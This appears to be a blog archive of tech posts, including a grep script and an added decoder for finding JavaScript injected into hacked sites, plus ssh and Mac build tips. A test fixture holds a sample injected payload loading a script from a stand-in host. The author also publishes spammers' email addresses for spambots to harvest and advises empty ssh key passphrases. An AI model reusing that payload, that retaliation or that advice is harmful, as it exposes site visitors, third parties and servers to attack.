Archive for the 'Geekery' Category

Facebook scales to 500 million users

A few of the big numbers Facebook deals with:
* 500 million active users
* 100 billion hits per day
* 50 billion photos
* 2 trillion objects cached, with hundreds of millions of requests per second
* 130TB of logs every day

Remember, there are only three numbers in computer science: 0, 1, and n. This is what scaling horizontally is – break out the infrastructure so that it’s trivial to add another instance of, say, a database server.

Read the full note from the Facebook engineering team: http://www.facebook.com/note.php?note_id=409881258919

Hacked MediaTemple sites inserting javascript malware

One of my friend’s sites recently had some javascript hacked into it. The injected code cunningly hid the contents of what it wrote to the screen, so searching through the files by normal means didn’t even show which files were affected.

So here’s a script which shows possibly hacked files. Assuming you have ssh access to your server, save it as check_for_hacked_js.sh and then chmod 755 it. To run it, type:

./check_for_hacked_js.sh

Once it’s done, check the contents of hacked.txt – and you’ll see all files which have possibly been hacked.

#!/bin/bash

# This script searches recursively through all files under the
# current directory for a certain string which writes some malware
# javascript to client browsers, and then saves the matching lines
# in hacked.txt for inspection.

# Written by Roger Saner on 2010.07.15

grep -ri "document.write(unescape" * > hacked.txt
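
A follow-up for triage, as an added example that is not part of the original script: it lists only the files containing the marker and decodes the percent-encoded string passed to unescape(), so you can read what the injected code writes. The function names, the sample files and the malware.invalid URL are constructed for illustration.

```shell
#!/bin/sh
# Added example (not the original post's script): list files that contain
# the document.write(unescape( marker and decode each %XX payload.

# Decode %XX escapes read from stdin, using only portable awk features.
urldecode() {
  awk '{
    hexdigits = "0123456789abcdef"; out = ""
    while (match($0, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
      hex = tolower(substr($0, RSTART + 1, 2))
      n = (index(hexdigits, substr(hex, 1, 1)) - 1) * 16
      n += index(hexdigits, substr(hex, 2, 1)) - 1
      out = out substr($0, 1, RSTART - 1) sprintf("%c", n)
      $0 = substr($0, RSTART + 3)
    }
    print out $0
  }'
}

# Print every matching file under DIR, followed by its decoded payload(s).
scan_injected_js() {
  dir=${1:-.}
  grep -rliF 'document.write(unescape(' "$dir" 2>/dev/null |
  while IFS= read -r f; do
    printf '== %s\n' "$f"
    grep -oiE "unescape\(['\"][^'\"]*['\"]" "$f" |
      sed -e "s/^[^'\"]*['\"]//" -e "s/['\"]\$//" | urldecode
  done
}

# Constructed sample: one injected file and one clean file in a temp dir.
make_sample() {
  d=$(mktemp -d)
  printf '%s\n' 'var menu = [];' > "$d/clean.js"
  printf '%s\n' "document.write(unescape('%3Cscript%20src%3D%22http%3A//malware.invalid/x.js%22%3E%3C/script%3E'));" > "$d/menu.js"
  echo "$d"
}

sample=$(make_sample)
scan_injected_js "$sample"
rm -rf "$sample"
```

Run scan_injected_js from the web root and redirect the output to a file outside that directory, so the report itself is not picked up by a later scan.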

Snow Leopard, Drupal, Macports and php

The short story is this: Snow Leopard ships with PHP 5.3.0, and although Drupal 6.14 now runs on that version, all previous Drupal versions run on 5.2. [Solution? Manual compile - instructions below]


South Africans: it’s legal to add people to your newsletters without their permission

Turns out it’s legal to spam people if you’re South African.

Import the correct package for Actionscript 3 functions

Warning: geeky rant follows. If you don’t care about Flash and Actionscript, don’t bother reading. Go and play in the sunlight, or whatever you people do for fun.

Stop spamming me, South Africans

Spam sucks. Americans have gotten a lot better at online marketing recently: only double-opt in lists are allowed (by law). Whereas South Africans suck email addresses out of the air and send unsolicited mail (spam) without asking the recipients to opt-in first. I can’t stop them, so the best I can do is publish their email addresses here in the hope spambots will pick them up, and send them lots of spam. Justice? I hope so.

[Update: turns out double-opt in lists aren't required, and South Africans can subscribe people to their newsletters without their permission. In my book, this is exactly what spam is, but South African law doesn't agree.]

[Update: I've deleted Diane's details from this post. After emailing her, she promptly responded saying that I'd been on her database for over a year and only sent 3 emails in that time (which is true) and that I could've unsubscribed earlier, which is also true. She denies being a spammer and wants me to only go after bigger companies. While she's incorrect that she's not a spammer (i.e. she sent me unsolicited commercial email) she does say that she spends a lot of money monthly making sure she complies with the marketing regulations. Diane, legally you're in the right (i.e. you can subscribe anyone you like to your newsletter) but if you do that, you're breaching internet etiquette - double opt-in lists are the way to go. I hope you've stopped subscribing random people to your list.]

The Diamond Life @ The Bank, Rosebank, Johannesburg, Sat 19 September

Sent out by anythinggoes.co.za on Sept 4 2009, this spam is about some new club launch in Jozi. Didn’t subscribe, lads.

C2IT Computer Hardware

c2it@wec2it.com sales@c2it.co.za prize@c2it.co.za

These guys make me chuckle. Their disclaimer at the bottom of their newsletter says,

We support responsible and ethical email marketing practices. Please know that we respect your right to be purged from this marketing campaign. Removal from this email distribution list is automatically enforced by our email delivery system. Please click here to start the process for email deletion.

Wow, they “respect my right to be purged from this marketing campaign.” What about my right to not be added to it in the first place?!?! They also say,

The person addressed in the email is the sole authorised recipient.

Authorised by who? Not by me, that’s for sure.

We encourage and support best practices in responsible email marketing.

Great! Best practices are double-opt in lists, otherwise you run the risk of annoying some random person out there who posts your website and your email addresses on his blog. I look forward to seeing if this post shows up higher on Google listings on searches for C2IT Computer Hardware.

These guys are also very, very annoyed by C2IT’s spammy practices.

[Updated: some Eagle-eyed car group selling Fords and Mazdas]

[Updated: kaleidoscope advertising and marketing say they got my name from Google.]

ssh logins without passwords

According to “How To Become A Hacker”, No problem should ever have to be solved twice.

My problem: logging into a particular server via ssh. Each time I do that, I’ve got to open Keychain Access, search for “ssh”, find the correct Password item which I added in there previously, open it, click “Show password”, type in my password to unlock my keychain, copy the password, paste it into terminal, and I’m in. A perfect task to be automated!

The outline of the solution is to use public/private key cryptography to automatically authenticate myself to the server without having to use a password each time. The steps are:

  • Generate a public and private key pair using ssh-keygen -t rsa
    Just follow the prompts and choose the defaults (yes, the passphrase must be empty too). Your private key will be saved in /Users/your-name/.ssh/id_rsa and your public key will be saved in /Users/your-name/.ssh/id_rsa.pub
  • Edit id_rsa.pub and copy the key into textedit. Make sure the key ends with the username you’ll be logging into the remote system with (something like user@example.com).
  • Copy the contents in textedit, ssh into the server as per normal, and append it to the end of the authorized_keys file in the .ssh/ folder.
  • To test, log in again using ssh. If all has gone well, you shouldn’t need to re-type your password :)

You’re done! I’ve added an extra step, by creating a new file called ssh-example.com and putting my full ssh connection string in it. Then I headed over to /usr/bin and did a sudo ln -s /path/to/script/ssh-example.com which means next time I want to connect, I just type ssh-example.com into terminal.

Thanks to these guys for the help.
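
The authorized_keys step from the list above, as an added example that is not code from the original post: a function that appends the public key only once and sets the conventional 700/600 permissions, which sshd's default StrictModes check accepts. The names install_pubkey and mode_of and the key line are constructed for illustration; on the server you would run install_pubkey with the uploaded id_rsa.pub and no second argument.

```shell
#!/bin/sh
# Added example (not from the original post): append a public key to
# authorized_keys exactly once, with the conventional 700/600 modes.

# install_pubkey PUBKEY_FILE [SSH_DIR]   (SSH_DIR defaults to ~/.ssh)
install_pubkey() {
  pub=$1
  sshdir=${2:-$HOME/.ssh}
  auth=$sshdir/authorized_keys

  # Take the first line shaped like "<type> <base64> [comment]". A private
  # key pasted by mistake ("-----BEGIN ...") never matches this pattern.
  key=$(grep -E '^(ssh|ecdsa)-[a-z0-9-]+ [A-Za-z0-9+/]+=*( .*)?$' "$pub" | head -n 1)
  [ -n "$key" ] || { echo "no public key found in $pub" >&2; return 1; }

  mkdir -p "$sshdir" && chmod 700 "$sshdir" || return 1
  touch "$auth" && chmod 600 "$auth" || return 1

  # If the file does not end in a newline, add one so keys are not joined.
  [ -z "$(tail -c 1 "$auth")" ] || echo >> "$auth"

  # Idempotent: append only when this exact line is not already present.
  grep -qxF -e "$key" "$auth" || printf '%s\n' "$key" >> "$auth"
}

# Show the permission string of a path, e.g. drwx------ or -rw-------.
mode_of() { ls -ld "$1" | cut -c1-10; }

# Demo on a temp directory with a constructed (non-functional) key line.
demo=$(mktemp -d)
printf '%s\n' 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABCONSTRUCTED user@example.com' > "$demo/id_rsa.pub"
install_pubkey "$demo/id_rsa.pub" "$demo/ssh"
install_pubkey "$demo/id_rsa.pub" "$demo/ssh"   # second run adds nothing
cat "$demo/ssh/authorized_keys"
echo "$(mode_of "$demo/ssh") $(mode_of "$demo/ssh/authorized_keys")"
rm -rf "$demo"
```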

Weird characters after Wordpress upgrade

I’ve just upgraded a few wordpress sites, and it all went well, except for the fact that it didn’t. This site was easy and quick – I’m impressed with how polished the wordpress experience is. I uploaded the new files, visited wp-admin, and wordpress did its thing. Sweet! Changed the theme, realised it didn’t support widgets, so added some code which let it do so, and voila. Done.

Then I did the same for a client’s site, except once the whole upgrade was done, her site was full of characters like

Payment gateways for websites in South Africa – a crowdsourcing experiment

I’m currently at the Net Prophet conference listening to some fine minds reaching into the future of the connected sphere in South Africa over the next 10 years. Since so many people here are familiar with e-commerce, I’m posing a question to the dev AND marketing minds here.

I’ve developed a few e-commerce websites for South African clients, and each time I go through the same process with them. To get to the point where it’s possible to sell products online, you need:

  • A business plan to show to a bank where you will
  • apply for a merchant account.

This means you’re paying something around R200 a month so that you can accept credit card payments…AND per-transaction fees of around 5-8%. Not that you’ve accepted any payments yet, but you have the capability. Then you need a payment gateway, which you’ll typically pay around R100 a month for, and you’ll also pay a per-transaction fee, either a set fee or a percentage.

Once all this is done, it’s time to set up a website with a shopping cart, and start selling. The costs look like this:

  • R200/month for the merchant account, plus 5-8% transaction fee.
  • R100/month for a payment gateway, plus per-transaction fees.
  • Monthly website hosting fees, say around R100/month.

Total monthly costs: R400 plus per-transaction fees.

So before we even get to the website design and development costs, we’re looking at R400/month. Obviously people moving small volumes of product can’t spend R400 a month to do this, which is why most SMEs don’t have e-commerce sites.

A great solution is to have PayPal active in South Africa, but they’re not going to do that any time soon, or probably ever. Since I’m a drupal developer, I posted a thread on groups.drupal.org (which has grown quite a lot) to ask what payment gateways people use, and pretty much heard the same story.

So, 2 questions:

  • Is getting a merchant account the only way of accepting credit card payments online, if you’re a South African?
  • If so, is there an easier and more cost-effective way of doing this?

Compilation of [package x] failed: ‘RTLD_NEXT’ undeclared

Summary: the compilation of some packages fails under OS X exiting with the error ‘RTLD_NEXT’ undeclared.
Solution: rename /usr/local/include/dlfcn.h to /usr/local/include/dlfcn.h.backup
Tested on: Mac OS 10.4.11
Geekiness: 5 / 5

I’m a Mac user who loves the world of Unix software. I can’t live without wget, lynx and the GD2 library (for resizing images in drupal).

However, these packages aren’t natively available on Mac. No problem! I have 2 options: Fink or Macports.

I’ve used Fink for over 4 years and by and large have been happy with it. Just last week I was chatting to caktux in the #drupal channel on irc.freenode.net (my Mac irc client is Colloquy – because I can’t find anything better) and he convinced me to start using subversion to manage my drupal module code. No problem, I fired up Fink…and found a horribly outdated version of svn. Not even the “latest unstable” version was close to what it should have been.

Twice in the last 2 weeks I’ve had people tell me that they prefer MacPorts: caktux and Adrian Rossouw. So I decided to uninstall Fink (by opening Fink Commander, selecting all packages, and making sure that both source and binary installs were removed, and then removing the /sw folder) and install MacPorts, which is painless.

wget and lynx were quickly available (sudo port install wget and sudo port install lynx) but GD2 was another story. I got the same error under MacPorts that I got while attempting to install GNUcash under Fink. Compilation exited with this error:

/usr/bin/gcc-4.0 -o hacklocaledir.so -fPIC -bundle hacklocaledir.c
hacklocaledir.c: In function '__open':
hacklocaledir.c:44: error: 'RTLD_NEXT' undeclared (first use in this function)
hacklocaledir.c:44: error: (Each undeclared identifier is reported only once
hacklocaledir.c:44: error: for each function it appears in.)
hacklocaledir.c: At top level:
hacklocaledir.c:113: warning: alias definitions not supported in Mach-O; ignored
make: *** [hacklocaledir.so] Error 1

‘RTLD_NEXT’ undeclared is the offending bit, which means nothing to me. Last time this happened, I searched the C files to see if I could manually declare RTLD_NEXT but gave up. Who knows what its value is supposed to be?

Well, the solution is something completely different. Turns out that everything in /usr/local will influence the compiler, particularly the existence of /usr/local/include/dlfcn.h

I can’t remember why that particular file is there or even why renaming it to dlfcn.h.backup allows GNUcash and GD2 to compile, but it does. Googling the error didn’t return many useful results, except from the MacPorts ticket list, so hopefully this blog post will help someone similarly bewildered.
